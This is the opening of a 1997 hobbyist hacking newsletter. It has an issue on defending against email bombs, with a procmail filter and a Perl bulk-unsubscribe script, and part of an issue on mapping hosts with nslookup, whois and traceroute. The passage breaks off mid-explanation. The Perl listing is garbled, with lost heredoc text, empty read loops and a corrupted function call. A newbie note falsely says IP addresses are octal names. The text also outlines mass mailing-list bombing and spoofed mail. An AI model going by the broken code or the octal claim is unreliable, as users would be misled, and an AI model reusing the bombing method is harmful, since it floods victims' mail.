Contents of Volume 3: How to protect yourself from email bombs! How to map the Internet. How to keep from getting kicked off IRC! How to Read Email Headers and Find Internet Hosts The Dread GTMHH on Cracking How to Be a Hero in Computer Lab Introduction to Computer Viruses The Magical Mystical Crypto Primer War Tools! Scan, Sniff, Spoof and Hijack How to Break into Windows NT ________________________________________ GUIDE TO (mostly) HARMLESS HACKING Vol. 3 Number 1 How to protect yourself from email bombs! ________________________________________ Email bombs! People like angry johnny, AKA the "Unamailer," have made the news lately by arranging for 20 MB or more of email -- tens of thousands of messages -- to flood every day into his victims' email accounts. Email bombing can be bad news for two reasons. One, the victim can't easily find any of their legitimate email in that giant garbage heap of spam. Two, the flood of messages ties up mail servers and chews up communications bandwidth. Of course, those are the two main reasons that email bombers make their attacks: to mess up people's email and/or harm the ISPs they target. The email bomb is a common weapon of war against Internet hosts controlled by spammers and con artists. It also is used by lusers with a grudge. News stories make it sound like email bombing victims are, ahem, s*** out of luck. But we aren't. We know, because angry -- the Christmas email bomber -- told the press that he had targeted the Happy Hacker list's Supreme Commanderess, Carolyn Meinel. (Someone simultaneously attempted to email bomb the Happy Hacker list itself but no one has stepped forward to take credit for the attempt). But as you know from the fact that we got the Happy Hacker Digest out after the attack, and by the fact that I kept answering my email, there are ways to beat the email bombers. Now most of these are techniques for use by experts only. But if you are, like most of us on this list, a newbie, you may be able to win points with your ISP by emailing its technical help people with some of the information within this guide. Maybe then they'll forgive you if your shell log file gets to looking a little too exciting! My first line of defense is to use several on-line services. That way, whenever one account is getting hacked, bombed, etc., I can just email all my correspondents and tell them where to reach me. Now I've never gotten bombed into submission, but I have gotten hacked badly and often enough that I once had to dump an ISP in disgust. Or, an ISP may get a little too anxious over your hacking experiments. So it's a good idea to be prepared to jump accounts. But that's a pretty chicken way to handle email bombing. Besides, a member of the Happy Hacker list says that the reason angry johnny didn't email bomb all the accounts I most commonly use is because he persuaded johnny to just bomb one for publicity purposes. But even if johnny had bombed all my favorite accounts, I could have been back on my feet in a hurry. There are several ways that either your ISP or you can defeat these attacks. The simplest defense is for your ISP to block mail bombs at the router. This only works, however, if the attack is coming from one or a few hosts. It also only works if your ISP agrees to help you out. Your ISP may just chicken out instead and close your account. *************************** Newbie note: routers are specialized computers that direct traffic. A host is a computer on the Internet. *************************** But what if the attack comes from many places on the Internet? That happened to me on Christmas day when angry johnny took credit for an email bombing attack that also hit a number of well-known US figures such as evangelist Billy Graham, President Bill Clinton and Speaker of the US House of Representatives Newt Gingrich. (I blush to find myself in such company.) The way angry johnny worked this attack was to set up a program that would go to one computer that runs a program to handle email lists and automatically subscribe his targets to all lists handled by that computer. Then his program went to another computer that handles email lists and subscribed his targets to all the lists it handled, and so on. I was able to fix my problem within a few minutes of discovery. johnny had subscribed all these lists to my address cmeinel@swcp.com. But I use my private domain, techbroker.com, to receive email. Then I pipe all this from my nameserver at Highway Technologies to whatever account I find useful at the time. So all I had to do was go to the Highway Technologies Web site and configure my mail server to pipe email to another account. ************************** Newbie note: a mail server is a computer that handles email. It is the one to which you hook your personal computer when you give it a command to upload or download your email. ************************** *********************** Evil genius tip: You can quickly reroute email by creating a file in your shell account (you do have a shell account, don't you? SHELL ACCOUNT! All good hackers should have a SHELL ACCOUNT!) named .forward. This file directs your email to another email account of your choice. *********************** If angry johnny had email bombed cmeinel@techbroker.com, I would have piped all that crud to dev/null and requested that my correspondents email to carolyn@techbroker.com, etc. It's a pretty flexible way of handling things. And my swcp.com accounts work the same way. That ISP, Southwest Cyberport, offers each user several accounts all for the same price, which is based on total usage. So I can create new email addresses as needed. Warning -- this technique -- every technique we cover here -- will still cause you to lose some email. But I figure, why get obsessive over it? According to a study by a major paging company, a significant percentage of email simply disappears. No mail daemon warning that the message failed, nothing. It just goes into a black hole. So if you are counting on getting every piece of email that people send you, dream on. But this doesn't solve my ISP's problem. They still have to deal with the bandwidth problem of all that crud flooding in. And it's a lot of crud. One of the sysadmins at Southwest Cyberport told me that almost every day some luser email bombs one of their customers. In fact, it's amazing that angry johnny got as much publicity as he did, considering how commonplace email bombing is. So essentially every ISP somehow has to handle the email bomb problem. How was angry johnny was able to get as much publicity as he did? You can get an idea from this letter from Lewis Koch, the journalist who broke the story (printed with his permission): From: Lewis Z Koch Subject: Question Carolyn: First, and perhaps most important, when I called you to check if you had indeed been email bombed, you were courteous enough to respond with information. I think it is a tad presumptuous for you to state that "as a professional courtesy I am _letting_ Lewis Koch get the full scoop." This was a story that was, in fact, exclusive. (Carolyn's note: as a victim I knew technical details about the attack that Koch didn't know. But since Koch tells me he was in contact with angry johnny in the weeks leading up to the mass email bombings of Christmas 1996, he clearly knew a great deal more than I about the list of johnny's targets. I also am a journalist, but deferred to Koch by not trying to beat him to the scoop.) Second, yes I am a subscriber and I am interested in the ideas you advance. But that interest does not extend to feeding you -- or single individual or group -- :"lots of juicy details." The details of any story lay in the writing and commentary I offer the public. "Juicy" is another word for sensationalism, a tabloid approach -- and something I carefully avoid. (Carolyn's note: If you wish to see what Koch wrote on angry johnny, you may see it in the Happy Hacker Digest of Dec. 28, 1996.) The fact is I am extraordinarily surprised by some of the reactions I have received from individuals, some of whom were targets, others who are bystanders. The whole point is that there are extraordinary vulnerabilities to and on the Net -- vulnerabilities which are being ignored...at the peril of us all. Continuing: "However, bottom line is that the email bomber used a technique that is ridiculously lame -- so lame that even Carolyn Meinel could turn off the attack in mere minutes. Fry in dev/null, email bomber!" johnny made the point several times that the attack was "simple." It was deliberately designed to be simple. I imagine -- I know -- that if he, or other hackers had chosen to do damage, serious, real damage, they could easily do so. They chose not to. One person who was attacked and was angry with my report. He used language such as "his campaign of terror," "the twisted mind of 'johnny'," "psychos like 'johnny'," "some microencephalic moron," "a petty gangster" to describe johnny. This kind of thinking ignores history and reality. If one wants to use a term such as "campaign of terror" they should check into the history of the Unabomber, or the group that bombed the Trade Center, or the Federal Building in Oklahoma City...or look to what has happened in Ireland or Israel. There one finds "terrorism." What happened was an inconvenience --equivalent, in my estimation, to the same kind of inconvenience people experienced when young people blocked the streets of major cities in protest against the war in Vietnam. People were inconvenienced --- but the protesters were making a point about an illegal and unnecessary war that even the prosecutors of the war, like Robert McNamara knew from the beginning was a lost venture. Hundreds of thousands of people lost their lives in that war -- and if some people found themselves inconvenienced by people protesting against it -- I say, too d*** bad. Thank you for forwarding my remarks to your list Ahem. I'm flattered, I guess. Is Koch suggesting the Happy Hacker list -- with its habit of ***ing out naughty words -- and evangelist Billy Graham -- whose faith I share -- are of an Earth-shaking level of political bad newsness comparable to the Vietnam War? So let's say you don't feel that it is OK for any two-bit hacker wannabe to keep you from receiving email. what are some more ways to fight email bombs? For bombings using email lists, one approach is to run a program that sorts through the initial flood of the email bomb for those "Welcome to the Tomato Twaddler List!" messages which tell how to unsubscribe. These programs then automatically compose unsubscribe messages and send them out. Another way your ISP can help you is to provide a program called Procmail (which runs on the Unix operating system. For details, Zach Babayco (zachb@netcom.com) has provided the following article. Thank you, Zach! ******************************* Defending Against Email-Bombing and Unwanted Mail Copyright (C) Zach Babayco, 1996 [Before I start this article, I would like to thank Nancy McGough for letting me quote liberally from her Filtering Mail FAQ, available at http://www.cis.ohio-state.edu/hypertext/faq/usenet/mail/filtering-faq/faq.html. This is one of the best filtering-mail FAQs out there, and if you have any problems with my directions or want to learn more about filtering mail, this is where you should look.] Lately, there are more and more people out there sending you email that you just don't want, like "Make Money Fast!" garbage or lame ezines that you never requested or wanted in the first place. Worse, there is the email bomb. There are two types of email bombs, the Massmail and the Mailing List bomb: 1) Massmail-bombing. This is when an attacker sends you hundreds, or perhaps even thousands of pieces of email, usually by means of a script and fakemail. Of the two types, this is the easier to defend against, since the messages will be coming from just a few addresses at the most. 2) Mailing List bombs. In this case, the attacker will subscribe you to as many mailing lists as he or she can. This is much worse than a massmail because you will be getting email from many different mailing lists, and will have to save some of it so that you can figure out how to unsubscribe from each list. This is where Procmail comes in. Procmail (pronounced prok-mail) is a email filtering program that can do some very neat things with your mail, like for example, if you subscribe to several high-volume mailing lists, it can be set up to sort the mail into different folders so that all the messages aren't all mixed up in your Inbox. Procmail can also be configured to delete email from certain people and addresses. Setting up Procmail ------------------- First, you need to see if your system has Procmail installed. From the prompt, type: > which procmail If your system has Procmail installed, this command will tell you where Procmail is located. Write this down - you will need it later. *NOTE* If your system gives you a response like "Unknown command: which" then try substituting 'which' with 'type', 'where', or 'whereis'. If you still cannot find Procmail, then it is probably a good bet that your system does not have it installed. However, you're not completely out of luck - look at the FAQ I mentioned at the beginning of this file and see if your system has any of the programs that it talks about. Next, you have to set up a resource file for Procmail. For the rest of this document, I will use the editor Pico. You may use whichever editor you feel comfortable with. Make sure that you are in your home directory, and then start up your editor. > cd > pico .procmailrc Enter the following in the .procmailrc file: # This line tells Procmail what to put in its log file. Set it to on when # you are debugging. VERBOSE=off # Replace 'mail' with your mail directory. MAILDIR=$HOME/mail # This is where the logfile and rc files will be kept PMDIR=$HOME/.procmail LOGFILE=$PMDIR/log # INCLUDERC=$PMDIR/rc.ebomb (yes, type the INCLUDERC line WITH the #) Now that you've typed this in, save it and go back up to your home directory. > cd > mkdir .procmail Now go into the directory that you just made, and start your editor up with a new file: rc.ebomb: IMPORTANT: Be sure that you turn off your editor's word wrapping during this part. You will need to have the second, third, and fourth lines of this next example all on one line. With Pico, use the -w flag. Consult your editor's manual page for instructions on turning off its word wrapping. Make sure that when you edit it, you leave NO SPACES in that line. > cd .procmail > pico -w rc.noebomb # noebomb - email bomb blocker :0 * ! ^((((Resent-)?(From|Sender)|X-Envelope-From):|From )(.*[^.%@a-z0-9])? (Post(ma?(st(e?r)?|n)|office)|Mail(er)?|daemon|mmdf|root|uucp|LISTSERV|owner |request|bounce|serv(ices?|er))([^.!:a-z0-9]|$))) * ! ^From:.*(postmaster|Mailer|listproc|majordomo|listserv|cmeinel|johnb) * ! ^TO(netstuff|computing|pcgames) /dev/null Lets see what these do. The first line tells Procmail that this is the beginning of a "recipe" file. A recipe it basically what it sounds like -- it tells the program what it should look for in each email message, and if it finds what it is looking for, it performs an action on the message - forwarding it to someone; putting it in a certain folder; or in this case, deleting it. The second, third, and fourth lines (the ones beginning with a *)are called CONDITIONS. The asterisk (*) tells Procmail that this is the beginning of a condition. The ! tells it to do the OPPOSITE of what it would normally do. Condition 1: * ! ^((((Resent-)?(From|Sender)|X-Envelope-From):|From )(.*[^.%@a-z0-9])? (Post(ma?(st(e?r)?|n)|office)|Mail(er)?|daemon|mmdf|root|uucp|LISTSERV|owner |request|bounce|serv(ices?|er))([^.!:a-z0-9]|$))) Don't freak out over this, it is simpler than it seems at first glance. This condition tells Procmail to look at the header of a message, and see if it is from one of the administrative addresses like root or postmaster, and also check to see if it is from a mailer-daemon (the thing that sends you mail when you bounce a message). If a message IS from one of those addresses, the recipe will put the message into your inbox and not delete it. Advanced User Note: Those of you who are familiar with Procmail are probably wondering why I require the user to type in that whole long line of commands, instead of using the FROM_MAILER command. Well, it looked like a good idea at first, but I just found out a few days ago that FROM_MAILER also checks the Precedence: header for the words junk, bulk, and list. Many (if not all) mailing-list servers have either Precedence: bulk or Precedence: list, so if someone subscribes you to several hundred lists, FROM_MAILER would let most of the messages through, which is NOT what we want. Condition 2: * ! ^From:.*(listproc|majordomo|cmeinel|johnb) This condition does some more checking of the From: line in the header. In this example, it checks for the words listproc, majordomo, cmeinel, and johnb. If it is from any of those people, it gets passed on to your Inbox. If not, it's a goner. This is where you would put the usernames of people who normally email you, and also the usernames of mailing-list servers, such as listproc and majordomo. When editing this line, remember to: only put the username in the condition, not a persons full email address, and remember to put a | between each name. Condition 3: * ! ^TO(netnews|crypto-stuff|pcgames) This final condition is where you would put the usernames of the mailing lists that you are subscribed to (if any). For example, I am subscribed to the netnews, crypto-stuff, and pcgames lists. When you get a message from most mailing lists, most of the time the list address will be in the To: or Cc: part of the header, rather than the From: part. This line will check for those usernames and pass them through to your Inbox if they match. Editing instructions are the same as the ones for Condition 2. The final line, /dev/null, is essentially the trash can of your system. If a piece of email does not match any of the conditions, (i.e. it isn't from a mail administrator, it isn't from a listserver or someone you write to, and it's not a message from one of your usual mailing lists) Procmail dumps the message into /dev/null, never to be seen again. Ok. Now you should have created two files: .procmailrc and rc.noebomb. We need one more before everything will work properly. Save rc.noebomb and exit your editor, and go to your home directory. Once there, start your editor up with the no word wrapping command. > cd > pico -w .forward We now go to an excerpt from Nancy M.'s Mail Filtering FAQ: Enter a modified version of the following in your ~/.forward: "|IFS=' ' && exec /usr/local/bin/procmail -f- || exit 75 #nancym" == IMPORTANT NOTES == * Make sure you include all the quotes, both double (") and single ('). * The vertical bar (|) is a pipe. * Replace /usr/local/bin with the correct path for procmail (see step 1). * Replace `nancym' with your userid. You need to put our userid in your .forward so that it will be different than anyother .forward ile on your system. * Do NOT use ~ or environment variables, like $HOME, in your .forward file. If procmail resides below your home directory write out the *full* path. On many systems you need to make your .forward world readable and your home directory world searchable in order for the mail transport agent to "see" it. To do this type: cd chmod 644 .forward chmod a+x . If the .forward template above doesn't work the following alternatives might be helpful: In a perfect world: "|exec /usr/local/bin/procmail #nancym" In an almost perfect world: "|exec /usr/local/bin/procmail USER=nancym" In another world: "|IFS=' ';exec /usr/local/bin/procmail #nancym" In a different world: "|IFS=' ';exec /usr/local/bin/procmail USER=nancym" In a smrsh world: "|/usr/local/bin/procmail #nancym" Now that you have all the necessary files made, it's time to test this filter. Go into your mailreader and create a new folder called Ebombtest. This procedure differs from program to program, so you may have to experiment a little. Then open up the rc.noebomb file and change /dev/null to Ebombtest. (You should have already changed Conditions 2 and 3 to what you want; if not, go do it now!) Finally, open up .procmailrc and remove the # from the last line. You will need to leave this on for a bit to test it. Ask some of the people in Condition 2 to send you some test messages. If the messages make it through to your Inbox, then that condition is working fine. Send yourself some fake email under a different name and check to see if it ends up in the Ebombtest folder. Also, send yourself some fakemail from root@wherever.com to make sure that Condition 1 works. If you're on any mailing lists, those messages should be ending up in your Inbox as well. If all of these test out fine, then congratulations! You now have a working defense against email bombs. For the moment, change the Ebombtest line in the rc.noebomb file back to /dev/null, and put the # in front of the INCLUDERC line in the .procmailrc file. If someone ever decides to emailbomb you, you only need to remove the #, and you will have greatly cut down on the amount of messages coming into your Inbox, giving you a little bit of breathing room to start unsubscribing to all those lists, or start tracking down those idiots who did it and get their asses kicked off their ISP's. If you have any comments or questions about this, email me at zachb@netcom.com. Emailbombs WILL go to /dev/null, so don't bother! Disclaimer: When you activate this program, it is inevitable that a small amount of wanted mail MAY get put into /dev/null, due to the fact that it is nearly impossible to know the names of all the people that may write to you. Therefore, I assume no responsibility for any email which may get lost, and any damages which may come from those lost messages. ******************** Don't have procmail? If you have a Unix box, you can download procmail from ftp://ftp.informatik.rwth-aachen.de/pub/packages/procmail/ ******************* A note of thanks goes to Damien Sorder (jericho@dimensional.com) for his assistance in reviewing this guide. And now, just to make certain you can get this invaluable Perl script to automatically unsubscribe email lists, here is the listing: #!/usr/local/bin/perl # unsubscribe # # A perl script by Kim Holburn, University of Canberra 1996. # kim@canberra.edu.au # Feel free to use this and adjust it. If you make any useful adjustments or # additions send them back to me. # # This script will unsubscribe users in bulk from whatever mail lists they are # subscribed to. It also mails them that it has done this. # It is useful for sys admins of large systems with many accounts and # floating populations, like student servers. # This script must be run by root although I don't check for this. # You have to be root to read someone else's mailbox and to # su to their account, both of which this script need to do. # # This script when applied to a mailbox will look through it to find # any emails sent by mailing lists, attempt to determine the address of the # mailing list and then send an unsubscribe message from that user. # If invoked with no options only the mailbox name(s) it will assume # the mailbox filename is the same as the username, as it is on a sun. # # Technical details: # To find emails from mailing lists it looks for "owner" as part of # the originating email address in the BSD From line (envelope). # list servers that don't do this will be missed if you can figure a way # round this let me know. # The script doesn't do any file locking but then it only reads the mailbox # file. sub fail_usage { if (@_ ne '') { print "Error : ", @_, "\n"; } print "Usage : $0 [-d] mailboxes\n"; print "Usage : $0 [-d] -u user mailbox\n"; print "Usage : $0 [-d] -u user -l listname -h host -a listserver\n"; print "where listserver is the full email address of the listserver\n"; exit; } sub unsub { local ($myuser, $mylist, $myhost, $myaddress) = @_; if (!$debug) { if (!open (SEND, "|(USER=$myuser;LOGNAME=$myuser;su $myuser -c \"/usr/ucb/mail $myaddress\")")) { print "Couldn't open mailer for user \"$myuser\"\n"; next; } print SEND "unsubscribe $mylist\n" ; close SEND; } else { print "No unsub \"$myuser\" on \"$mylist@$myhost\" to :\n"; print " $myaddress\n"; } } sub notify { local($myuser, $mylist, $myhost, $myaddress) = @_; if (!$debug) { if (!open (SEND, "|/usr/ucb/mail -s \"unsubscribed $mylist\" $myuser")) { print "Couldn't open mailer for user \"$myuser\"\n"; next; } $mess = < (-1)) && ($ARGV[0] =~ /^-/)) { if ($ARGV[0] eq '-d') { shift ARGV; $debug=1; } elsif ($#ARGV < 1) { &fail_usage("option \"$ARGV[0]\" needs an argument"); } elsif ($ARGV[0] eq '-u') { shift ARGV; $user=shift ARGV; } elsif ($ARGV[0] eq '-l') { shift ARGV; $list=shift ARGV; } elsif ($ARGV[0] eq '-h') { shift ARGV; $host=shift ARGV; } elsif ($ARGV[0] eq '-a') { shift ARGV; $address=shift ARGV; } else { &fail_usage(); } } $usersupplied = ($user ne '') ; #print "debug d=\"$debug\" u=\"$user\" l=\"$list\" h=\"$host\"\n"; #print "debug \$#ARGV=$#ARGV a=\"$address\" \n"; if ($#ARGV == (-1)) { if ($usersupplied && $list ne '' && $host ne '' && $address ne '' && $#ARGV) { $list =~ s/@.*$//; $user =~ s/@.*$//; $host =~ s/^.*@//; if ($address !~ /@/) { &fail_usage("bad address"); } &unsub ($user, $list, $host, $address); ¬ify ($user, $list, $host, $address); exit; } else { &fail_usage("no files and no addresses"); } } if ($usersupplied && $#ARGV > 0) { &fail_usage(); } foreach $file (@ARGV) { %addresses=(); if (!$usersupplied) { $user=$file; } $user =~ s@^.*/@@; if ($file =~ /^\./) { print "skipping wrong type of file \"$file\"\n"; next; } if ($file =~ /\.lock/) { print "skipping lock file \"$file\"\n"; next; } if ($file =~ /\./) { print "skipping wrong type of file \"$file\"\n"; next; } $user =~ s/^\.//; $user =~ s/\..*$//; if (!open (MYFILE, "<$file" )) { print "Couldn't open file \"$file\"\n"; next; } print "--------------------------opening file \"$file\"\n"; while () { # if (/(\bnews-[-\w.]+@)|([-\w.]+-news@)/i) # if (/(\brequest-[-\w.]+@)|([-\w.]+-request@)/i) if (/(\bowner-[-\w.]+@)|([-\w.]+-owner@)/i) { chop; tr/A-Z/a-z/; if (/\bowner-[-\w.]+@/) { s/^.*\bowner-([-\w.]+@[\w.]+)\b.*$/\1/; } else { s/(^|^.*[^-\w.])([-\w.]+)-owner(@[\w.]+)\b.*$/\2\3/; } if (/[^a-z0-9@.-]/) { next; } if (!defined ($addresses{$_})) { $addresses{$_}=""; } } if (/(\bl-[-\w.]+@)|([-\w.]+-l@)/i) { chop; tr/A-Z/a-z/; if (/\bl-[-\w.]+@/) { s/^.*\bl-([-\w.]+@[\w.]+)\b.*$/\1/; } else { s/(^|^.*[^-\w.])([-\w.]+)-l(@[\w.]+)\b.*$/\2\3/; } if (/[^a-z0-9@.-]/) { next; } if (!defined ($addresses{$_})) { $addresses{$_}=""; } } } close MYFILE; while (($key,$value)=each %addresses) { print "$key\n"; } if (! keys %addresses ) { print "no listservers\n"; next; } if (! open (MYFILE, "<$file" )) { print "Couldn't open file \"$file\"\n"; next; } print "looking for listserver addresses\n"; while () { foreach $address (keys %addresses) { $host=$address; $host =~ s/^.*@//; if (/(listserv|listproc|majordomo)@$host/i) { $addresses{$address}=$1; # print "found 1 = \"$1\"\n"; } } } close MYFILE; while (($key,$value)=each %addresses) { $host=$key; $host=~s/^.*@//; $list=$key; $list=~s/@.*$//; # print "$value@$host key=\"$key\" list=\"$list\" \n"; if ($value eq '') { $address="listserv@$host,listproc@$host,majordomo@$host"; } else { $address="$value@$host"; } print "address=\"$address\"\n"; print "unsubscribe $list\n"; if (!$debug) { print "Mailing $user\n"; &unsub ($user, $list, $host, $address); ¬ify ($user, $list, $host, $address); } else { print "debug no mail\n"; } } } ________________________________________ Subscribe to our email list by emailing to hacker@techbroker.com with message "subscribe" or join our Hacker forum at http://www.infowar.com/cgi-shl/login.exe. Want to share some kewl stuph with the Happy Hacker list? Correct mistakes? Send your messages to hacker@techbroker.com. To send me confidential email (please, no discussions of illegal activities) use cmeinel@techbroker.com and be sure to state in your message that you want me to keep this confidential. If you wish your message posted anonymously, please say so! Please direct flames to dev/null@techbroker.com. Happy hacking! Copyright 1997 Carolyn P. Meinel. You may forward or post on your Web site this GUIDE TO (mostly) HARMLESS HACKING as long as you leave this notice at the end.. ________________________________________ ____________________________________________________________ GUIDE TO (mostly) HARMLESS HACKING Vol. 3 Number 2 How to map the Internet. Dig! Whois! Nslookup! Traceroute! Netstat port is getting hard to use anymore, however... ____________________________________________________________ Why map the Internet? * Because it's fun -- like exploring unknown continents. The Internet is so huge, and it changes so fast, no one has a complete map. * Because when you can't make contact with someone in a distant place, you can help your ISP trouble shoot broken links in the Internet. Yes, I did that once that when email failed to a friend in Northern Ireland. How will your ISP know that their communications provider is lying down on the job unless someone advises them of trouble? * Because if you want to be a computer criminal, your map of the connections to your intended victim gives you valuable information. Now since this is a lesson on *legal* hacking, we're not going to help you out with how to determine the best box in which to install a sniffer or how to tell what IP address to spoof to get past a packet filter. We're just going to explore some of the best tools available for mapping the uncharted realms of the Internet. For this lesson, you can get some benefit even if all you have is Windows. But to take full advantage of this lesson, you should either have some sort of Unix on your personal computer, or a shell account! SHELL ACCOUNT! If you don't have one, you may find an ISP that will give you a shell account at http://www.celestin.com/pocia/. **************************** Newbie note: A shell account is an account with your ISP that allows you to give commands on a computer running Unix. The "shell" is the program that translates your keystrokes into Unix commands. Trust me, if you are a beginner, you will find bash (for Bourne again shell) to be easiest to use. Ask tech support at your ISP for a shell account set up to use bash. Or, you may be able to get the bash shell by simply typing the word "bash" at the prompt. If your ISP doesn't offer shell accounts, get a new ISP that does offer it. A great book on using the bash shell is _Learning the Bash Shell_, by Cameron Newham and Bill Rosenblatt, published by O'Reilly. **************************** So for our mapping expedition, let's start by visiting the Internet in Botswana! Wow, is Botswana even on the Internet? It's a lovely landlocked nation in the southern region of Africa, famous for cattle ranching, diamonds and abundant wildlife. The language of commerce in Botswana is English, so there's a good chance that we could understand messages from their computers. Our first step in learning about Botswana's Internet hosts is to use the Unix program nslookup. **************************** Evil genius tip: Nslookup is one of the most powerful Internet mapping tools in existence. We can hardly do it justice here. If you want to learn how to explore to the max, get the book _DNS and BIND_ by Paul Albitz and Cricket Liu, published by O'Reilly, 1997 edition. *************************** The first step may be to find where your ISP has hidden the program by using the command "whereis nslookup." (Or your computer may use the "find" command.) Aha -- there it is! I give the command: ->/usr/etc/nslookup Default Server: swcp.com Address: 198.59.115.2 > These two lines and the slightly different prompt (it isn't an arrow any more) tell me that my local ISP is running this program for me. (It is possible to run nslookup on another computer from yours.) Now we are in the program, so I have to remember that my bash commands don't work any more. Our next step is to tell the program that we would like to know what computers handle any given domain name. > set type=ns Next we need to know the domain name for Botswana. To do that I look up the list of top level domain names on page 379 of the 1997 edition of _DNS and BIND_. For Botswana it's bw. So I enter it at the prompt, remembering -- this is VERY important -- to put a period after the domain name: > bw. Server: swcp.com Address: 198.59.115.2 Non-authoritative answer: This "non-authoritative answer" stuff tells me that this information has been stored for awhile, so it is possible, but unlikely, that the information below has changed. bw nameserver = DAISY.EE.UND.AC.ZA bw nameserver = RAIN.PSG.COM bw nameserver = NS.UU.NET bw nameserver = HIPPO.RU.AC.ZA Authoritative answers can be found from: DAISY.EE.UND.AC.ZA inet address = 146.230.192.18 RAIN.PSG.COM inet address = 147.28.0.34 NS.UU.NET inet address = 137.39.1.3 HIPPO.RU.AC.ZA inet address = 146.231.128.1 I look up the domain name "za" and discover it stands for South Africa. This tells me that the Internet is in its infancy in Botswana -- no nameservers there -- but must be well along in South Africa. Look at all those nameservers! *********************** Newbie note: a nameserver is a computer program that stores data on the Domain Name System. The Domain Name System makes sure that no two computers have the same name. It also stores information on how to find other computers. When various nameservers get to talking with each other, they eventually, usually within seconds, can figure out the routes to any one of the millions of computers on the Internet. *********************** Well, what this tells me is that people who want to set up Internet host computers in Botswana usually rely on computers in South Africa to connect them. Let's learn more about South Africa. Since we are still in the nslookup program, I command it to tell me what computers are nameservers for South Africa: > za. Server: swcp.com Address: 198.59.115.2 Non-authoritative answer: za nameserver = DAISY.EE.UND.AC.za za nameserver = UCTHPX.UCT.AC.za za nameserver = HIPPO.RU.AC.za za nameserver = RAIN.PSG.COM za nameserver = MUNNARI.OZ.AU za nameserver = NS.EU.NET za nameserver = NS.UU.NET za nameserver = UUCP-GW-1.PA.DEC.COM za nameserver = APIES.FRD.AC.za Authoritative answers can be found from: DAISY.EE.UND.AC.za inet address = 146.230.192.18 UCTHPX.UCT.AC.za inet address = 137.158.128.1 HIPPO.RU.AC.za inet address = 146.231.128.1 RAIN.PSG.COM inet address = 147.28.0.34 MUNNARI.OZ.AU inet address = 128.250.22.2 MUNNARI.OZ.AU inet address = 128.250.1.21 NS.EU.NET inet address = 192.16.202.11 UUCP-GW-1.PA.DEC.COM inet address = 204.123.2.18 UUCP-GW-1.PA.DEC.COM inet address = 16.1.0.18 APIES.FRD.AC.za inet address = 137.214.80.1 *********************** Newbie note: What is inet address = 137.214.80.1 supposed to mean? That's the name of a computer on the Internet (inet) -- in this case APIES.FRD.AC -- in octal. Octal is like regular numbers except in base 8 rather than base 10. All computer names on the Internet must be changed into numbers so that other computers can understand them. ********************** Aha! Some of those nameservers are located outside South Africa. We see computers in Australia (au) and the US (com domain). Next, we exit the nslookup program with the command ^D. That's made by holding down the control key while hitting the small "d" key. It is VERY IMPORTANT to exit nslookup this way and not with ^C. Next, we take one of the nameservers in South Africa and ask: ->whois HIPPO.RU.AC.ZA [No name] (HIPPO) Hostname: HIPPO.RU.AC.ZA Address: 146.231.128.1 System: SUN running SUNOS Domain Server Record last updated on 24-Feb-92. To see this host record with registered users, repeat the command with a star ('*') before the name; or, use '%' to show JUST the registered users. The InterNIC Registration Services Host contains ONLY Internet Information (Networks, ASN's, Domains, and POC's). Please use the whois server at nic.ddn.mil for MILNET Information. Kewl! This tells us what kind of computer it is -- a Sun -- and the operating system, Sun OS. Now, just for variety, I use the whois command with the numerical address of one of the nameservers. This doesn't always give back the text name, but sometimes it works. And, voila, we get: ->whois 146.230.192.18 [No name] (DAISY1) Hostname: DAISY.EE.UND.AC.ZA Address: 146.230.192.18 System: HP-9000 running HP-UX Domain Server Record last updated on 14-Sep-94. Ah, but all this is doing so far is just telling us info about who is a nameserver for whom. Now how about directly mapping a route from my computer to South Africa? For that we will use the traceroute command. ************************ Netiquette tip: The traceroute program is intended for use in network testing, measurement and management. It should be used primarily for manual fault isolation, like the time I couldn't email my friend in Northern Ireland. Because of the load it could impose on the network, it is unwise to use traceroute from automated scripts which could cause that program to send out huge numbers of queries. Use it too much and your ISP may start asking you some sharp questions. ************************ ************************ YOU COULD GO TO JAIL WARNING: If you just got an idea of how to use traceroute for a denial of service attack, don't call your favorite journalist and tell him or her that you are plotting a denial of service attack against the ISPs that serve famous people like Bill Clinton and Carolyn Meinel!:-) Don't write that script. Don't use it. If you do, I'll give another interview to PC World magazine (http://www.pcworld.com/news/newsradio/meinel/index.html) about how a three-year-old could run the attack. And if you get caught we'll all laugh at you as you get hustled off in chains while your journalist friend gets a $250K advance on his or her book deal about you. ************************ I give the command: ->whereis traceroute traceroute: /usr/local/bin/traceroute OK, now we're ready to map in earnest. I give the command: ->/usr/local/bin/traceroute DAISY.EE.UND.AC.ZA And the answer is: traceroute to DAISY.EE.UND.AC.ZA (146.230.192.18), 30 hops max, 40 byte packets 1 sisko (198.59.115.1) 3 ms 4 ms 4 ms 2 glory-cyberport.nm.westnet.net (204.134.78.33) 47 ms 8 ms 4 ms 3 ENSS365.NM.ORG (129.121.1.3) 5 ms 10 ms 7 ms 4 h4-0.cnss116.Albuquerque.t3.ans.net (192.103.74.45) 17 ms 41 ms 28 ms 5 f2.t112-0.Albuquerque.t3.ans.net (140.222.112.221) 7 ms 6 ms 5 ms 6 h14.t16-0.Los-Angeles.t3.ans.net (140.223.17.9) 31 ms 39 ms 84 ms 7 h14.t8-0.San-Francisco.t3.ans.net (140.223.9.13) 67 ms 43 ms 68 ms 8 enss220.t3.ans.net (140.223.9.22) 73 ms 58 ms 54 ms 9 sl-mae-w-F0/0.sprintlink.net (198.32.136.11) 97 ms 319 ms 110 ms 10 sl-stk-1-H11/0-T3.sprintlink.net (144.228.10.109) 313 ms 479 ms 473 ms 11 sl-stk-2-F/T.sprintlink.net (198.67.6.2) 179 ms * * 12 sl-dc-7-H4/0-T3.sprintlink.net (144.228.10.106) 164 ms * 176 ms 13 sl-dc-7-F/T.sprintlink.net (198.67.0.1) 143 ms 129 ms 134 ms 14 gsl-dc-3-Fddi0/0.gsl.net (204.59.144.197) 135 ms 152 ms 130 ms 15 204.59.225.66 (204.59.225.66) 583 ms 545 ms 565 ms 16 * * * 17 e0.csir00.uni.net.za (155.232.249.1) 516 ms 436 ms 400 ms 18 s1.und00.uni.net.za (155.232.70.1) 424 ms 485 ms 492 ms 19 e0.und01.uni.net.za (155.232.190.2) 509 ms 530 ms 459 ms 20 s0.und02.uni.net.za (155.232.82.2) 650 ms * 548 ms 21 Gw-Uninet1.CC.und.ac.za (146.230.196.1) 881 ms 517 ms 478 ms 22 cisco-unp.und.ac.za (146.230.128.8) 498 ms 545 ms * 23 IN.ee.und.ac.za (146.230.192.18) 573 ms 585 ms 493 ms So what does all this stuff mean? The number in front of each line is the number of hops since leaving the computer that has the shell account I am using. The second entry is the name of the computer through which this route passes, first in text, and then in parentheses its numerical representation. The 